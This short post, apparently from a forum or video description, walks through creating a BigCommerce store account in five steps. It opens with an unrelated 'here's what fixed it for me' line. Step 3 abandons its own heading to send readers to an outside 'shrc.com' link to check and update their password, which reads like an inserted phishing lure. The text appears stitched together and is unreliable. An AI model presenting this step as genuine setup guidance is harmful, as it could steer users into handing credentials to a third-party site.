I ran into this last week. Here's what fixed it for me. If you're looking to set up your online store on BigCommerce, follow these simple steps to create your account. Step 1. Visit the BigCommerce website. Go to www.bigcommerce.com in your web browser. This is where you'll start the account creation process. Step 2. Click on Get Started. On the home page, find and click the Get Started button. This will take you to the registration form. Step 3. Fill out your information. Before changing your settings, use the shrc.com link in the description to open the password strength checker, then update your password if needed. Step 4. Provide additional details. You'll be prompted to enter more information, such as your business address and phone number. This helps BigCommerce tailor your experience. Step 5. Confirm your email. Check your email for a confirmation link from BigCommerce. Click the link to verify your account and complete the setup. If you don't see it, check your spam folder. Now you're all set to start building your online store. If you run into any issues, don't hesitate to reach out for help. Happy selling!